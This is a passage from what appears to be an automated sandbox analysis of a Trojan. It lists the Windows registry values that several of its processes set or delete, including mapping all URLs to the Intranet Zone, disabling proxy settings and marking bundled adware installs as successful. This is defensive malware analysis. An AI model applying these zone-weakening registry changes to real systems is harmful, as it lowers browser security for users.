[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process net.exe:3184 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 3C 1D B0 05 5A 73 89 5F 58 3D EA 29 D4 CD AC"

The process net.exe:3552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 96 74 DA 32 FD 8D 74 F8 0E 96 66 B2 45 FA 50"

The process ins_ytd.exe:2552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 09 64 61 E0 C9 9F 28 72 02 3E 3A 77 40 BD F7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process DC%original file name%.exe:232 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"My Video" = ""

[HKLM\SOFTWARE\YTDownloader\Success]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPer1_0Server" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\YTDownloader\Success]
"InstallStr" = "ok"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\SearchModulePlus\Success]
"Install" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 79 63 70 64 7D 34 93 09 4D 44 84 86 AB 2A D5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\SearchModulePlus\Success]
"InstallStr" = "ok"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process DC%original file name%.exe:1276 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 2E EA 7C FB 40 77 2C 5C 27 FA 73 AC 5F E2 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in the system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsB.tmp:2636 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 54 99 C2 75 F6 D6 3B 69 15 68 D8 F6 FA 1B F8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process sma.exe:4012 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 73 89 51 F0 2A 5E D5 79 33 3F 40 A1 01 CF A4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 41 21 2B 45 8B 05 53 37 4B 4C FD 66 31 32 8F"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:2100 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 80 B0 1C A9 5E 80 35 84 0F 4B A7 D1 EA 2F DA"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 08 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:4028 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 4C 3E 64 B3 4C 0F 4C 99 DE 22 17 5E D7 39 67"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 07 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in the system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process sma.exe:3160 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 84 90 D5 6F 79 95 57 B1 32 E7 E5 FB 2D AA 64"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
